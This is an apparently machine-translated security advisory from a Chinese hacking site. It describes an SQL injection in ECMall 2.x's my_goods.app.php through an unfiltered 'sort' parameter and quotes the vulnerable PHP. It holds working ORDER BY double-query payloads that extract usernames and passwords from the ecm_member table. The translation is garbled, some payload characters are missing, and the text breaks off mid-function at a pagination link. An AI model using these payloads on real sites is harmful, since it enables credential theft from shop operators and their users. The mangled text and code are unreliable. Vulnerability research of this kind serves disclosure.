Ecmall 2. x version exist through the kill SQL injection vulnerability-vulnerability warning-the black bar safety net

2013-12-25T00:00:00
ID MYHACK58:62201341565
Type myhack58
Reporter 佚名
Modified 2013-12-25T00:00:00

Description

Brief description:

Originally wanted to complete analysis and then struggle ECSHOP...the result has not been to old cassock opportunity to Ah,more and more can't believe is not the official version,is not under the wrong. Drink more the head a little dizzy. I don't know if the analysis is written wrong...

Detailed description:

the order by parameters of the injection,the back can not be with the union,but you can use double query.

select...from...order by 1 and (select user_name from ecm_member where user_id=1)

Or

select...from...order by 1,(select user_name from ecm_member where user_id=1)

But in the 2nd select inside of the CAN with union

select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(),concat(floor(rand(0)2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema. tables group by a)b)

Or

select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(),concat(floor(rand(0)2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema. tables group by a)b)

app/my_goods.app.php

function index()

{

/ Obtain the store merchandise categories /

$this->assign('sgcategories', $this->_get_sgcategory_options());

$conditions = $this->_get_conditions();

$page = $this->_get_page();

$page_nolimit = array();

$goods_list = $this->_get_goods($conditions, $page); //follow up

$all_goods = $this->_get_goods($conditions, $page_nolimit);

......

}

function _get_goods($conditions, &$page)

{

if (intval($_GET['sgcate_id']) > 0)

{

$cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id));

$cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));

}

else

{

$cate_ids = 0;

}

// Code has no filter conditions

if ($conditions!= '1 = 1' || ! empty($_GET['sgcate_id']))

{

$this->assign('filtered', 1);

}

//Update the sort

if (isset($_GET['sort']) && isset($_GET['order']))

{

$sort = via strtolower(trim($_GET['sort'])); //not filtered

$order = via strtolower(trim($_GET['order']));

if (! in_array($order,array('asc','desc'))) //only limit order,no limit to the sort

{

$sort = 'goods_id';

$order = 'desc';

}

}

else

{

$sort = 'goods_id';

$order = 'desc';

}

if ($page)

{

$limit = $page['limit'];

[1] [2] next